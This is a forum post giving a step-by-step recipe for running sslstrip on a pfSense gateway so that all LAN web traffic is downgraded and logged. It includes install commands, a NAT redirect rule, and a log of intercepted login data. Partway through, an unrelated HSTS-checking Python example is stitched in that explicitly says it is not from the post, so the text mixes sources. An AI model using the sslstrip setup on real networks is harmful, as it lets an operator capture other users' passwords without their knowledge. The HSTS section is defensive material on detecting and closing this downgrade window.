Netgate Discussion Forum

    Running SSLSTRIP on a pfSense box

    Off-Topic & Non-Support Discussion
      alt0001

      Hi all, this is my first post here.

      I consider myself to be a total noob when it comes to pfSense or FreeBSD. However, I was looking into MITM type attacks for fun and wondered if it would be possible to run sslstrip on the gateway itself so as to automatically process all traffic without the need for ARP poisoning. I searched the web but couldn't find any info on how to do this, but I got it working on my own and thought I would share my experience here.

      I don't know exactly where to put this so I chose the general forum. Mods feel free to move it to a more appropriate location.

      First, we need to add a couple of packages to the box so SSLstrip can actually run:

      pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-twistedWeb-9.0.0.tbz
      

      This installs the Python Twisted Web python-module which is needed for sslstrip functionality. As a bonus, python itself gets installed automatically as a dependency.

      pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-openssl-0.10.tbz
      

      The openssl python-module is also needed for sslstrip; I couldn't start sslstrip without it.

      pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/ftp/wget-1.12_1.tbz
      

      Installing wget ensures an easy method of getting the sslstrip tar file on your box.

      rehash
      

      Don't know what this is for, but I read online that you need to do this after installing packages.

      cd
      

      Let's run everything from the root home dir…

      wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
      

      Download the sslstrip files.

      tar zxvf sslstrip-0.9.tar.gz
      

      Extract the files to the ~/sslstrip-0.9 directory.

      cd sslstrip-0.9
      

      Change to the extracted directory.

      python setup.py install
      

      Install the sslstrip files to the system.

      So now you can test whether it works:

      /usr/local/bin/sslstrip -h
      

      You should get something like this:

      [2.0.2-RC3][root@pfsense.localdomain]/root(2): /usr/local/bin/sslstrip -h
      
      sslstrip 0.9 by Moxie Marlinspike
      Usage: sslstrip <options>
      
      Options:
      -w <filename>, --write=<filename> Specify file to log to (optional).
      -p , --post                       Log only SSL POSTs. (default)
      -s , --ssl                        Log all SSL traffic to and from server.
      -a , --all                        Log all SSL and HTTP traffic to and from server.
      -l <port>, --listen=<port>        Port to listen on (default 10000).
      -f , --favicon                    Substitute a lock favicon on secure requests.
      -k , --killsessions               Kill sessions in progress.
      -h                                Print this help message.
      
      [2.0.2-RC3][root@pfsense.localdomain]/root(3):
      

      Now, we need to create a NAT rule to forward all TCP port 80 traffic to the port on which sslstrip listens. This is port 10000 by default.

      Go to Firewall/NAT and create a new rule. Source address=LAN Net, proto=tcp, dest ports=80, nat ip=<ip address of your box>, nat ports=10000. A firewall rule should be created automatically for you to open port 10000.

      Now in an SSH shell, run

      /usr/local/bin/sslstrip &
      

      This ensures sslstrip remains active even if you close the ssh session.

      Now a logfile called sslstrip.log is created in root's home dir, which should contain passwords.

      Output of the file looks like so:

      [2.0.2-RC3][root@pfsense.localdomain]/root(9): cat sslstrip.log
      2012-07-03 21:49:49,290 POST Data (www.facebook.com):
      lsd=AVpQRVOK&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=2&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&timezone=-120&lgnrnd=124859_hr3C&lgnjs=n&email=testing&pass=testing123&default_persistent=0&login=Log+In
      [2.0.2-RC3][root@pfsense.localdomain]/root(10):
      

      You can see I entered testing as a username and testing123 as a password.

      That's all now. Please use this in an ethically responsible way.
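The post stops at the point where credentials land in the log, so the defender's half is worth spelling out. The downgrade sslstrip performs only works when the browser is willing to send a plain http:// request in the first place; a browser that already holds an HSTS (Strict-Transport-Security, RFC 6797) policy for the host refuses to do that and upgrades the request itself, so there is nothing for the proxy on port 10000 to rewrite. The following Python is an added example, not code from the forum post or from pfSense or sslstrip: it models a browser's HSTS cache, learns policies from constructed sample responses (the hostnames and headers are made up for the example), and reports which plain-http requests a compliant browser would refuse to send. It also lists the policy weaknesses an operator should fix on their own sites (short max-age, missing includeSubDomains, no preload directive).

```python
from urllib.parse import urlsplit

# Recommended minimum max-age for a robust HSTS policy: one year, in seconds.
ONE_YEAR = 31536000


def parse_hsts(value):
    """Parse a Strict-Transport-Security header value.

    Returns a dict with max_age, include_subdomains and preload, or None when
    the header carries no usable max-age (browsers ignore such a header).
    """
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        directive = directive.strip()
        if not directive:
            continue
        name, _, arg = directive.partition("=")
        name = name.strip().lower()
        arg = arg.strip().strip('"')
        if name == "max-age":
            if not arg.isdigit():
                return None
            policy["max_age"] = int(arg)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    if policy["max_age"] is None:
        return None
    return policy


def learn_policy(cache, host, headers):
    """Update an HSTS cache (dict host -> policy) from one HTTPS response.

    headers is a list of (name, value) pairs. A max-age of 0 deletes any stored
    policy, as the RFC 6797 processing rules require.
    """
    for name, value in headers:
        if name.lower() == "strict-transport-security":
            policy = parse_hsts(value)
            if policy is None:
                return
            if policy["max_age"] == 0:
                cache.pop(host, None)
            else:
                cache[host] = policy
            return


def downgrade_blocked(cache, url):
    """True if a browser holding this cache would refuse the plain-text request
    for url and upgrade it to https itself (so a port-80 redirect never sees it)."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not parts.hostname:
        return False
    labels = parts.hostname.lower().split(".")
    # Exact host match first, then every parent domain with includeSubDomains.
    for i in range(len(labels)):
        policy = cache.get(".".join(labels[i:]))
        if policy and (i == 0 or policy["include_subdomains"]):
            return True
    return False


def policy_findings(policy):
    """List the weaknesses a practitioner would flag in an HSTS policy."""
    findings = []
    if policy["max_age"] < ONE_YEAR:
        findings.append("max-age below one year")
    if not policy["include_subdomains"]:
        findings.append("includeSubDomains missing")
    if not policy["preload"]:
        findings.append("preload directive absent")
    return findings


# Constructed sample responses for the example; not captured from real sites.
SAMPLE_RESPONSES = {
    "www.example.com": [("Content-Type", "text/html"),
                        ("Strict-Transport-Security",
                         "max-age=31536000; includeSubDomains; preload")],
    "shop.example.net": [("Content-Type", "text/html"),
                         ("Strict-Transport-Security", "max-age=86400")],
    "legacy.example.org": [("Content-Type", "text/html")],  # no HSTS at all
}


def simulate():
    """Fill a cache from the samples, then test plain-http requests against it."""
    cache = {}
    for host, headers in SAMPLE_RESPONSES.items():
        learn_policy(cache, host, headers)
    urls = [
        "http://www.example.com/login",
        "http://api.www.example.com/",        # covered via includeSubDomains
        "http://shop.example.net/checkout",
        "http://legacy.example.org/login",    # no policy: leaves in the clear
    ]
    return {url: downgrade_blocked(cache, url) for url in urls}


if __name__ == "__main__":
    for url, blocked in simulate().items():
        print(f"{'refused' if blocked else 'SENT IN CLEAR':13} {url}")
    print("findings for shop.example.net:",
          policy_findings(parse_hsts("max-age=86400")))
```

The case the model makes visible is the empty cache: a browser's very first visit to a host, or a visit after max-age has lapsed, is sent as plain HTTP and is exactly the window a downgrade proxy uses. That window is closed only by a policy strong enough to be shipped in the browsers' preload list, which is why the findings function treats a short max-age, a missing includeSubDomains and a missing preload directive as defects rather than style points.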

      Copyright 2025 Rubicon Communications LLC (Netgate). All rights reserved.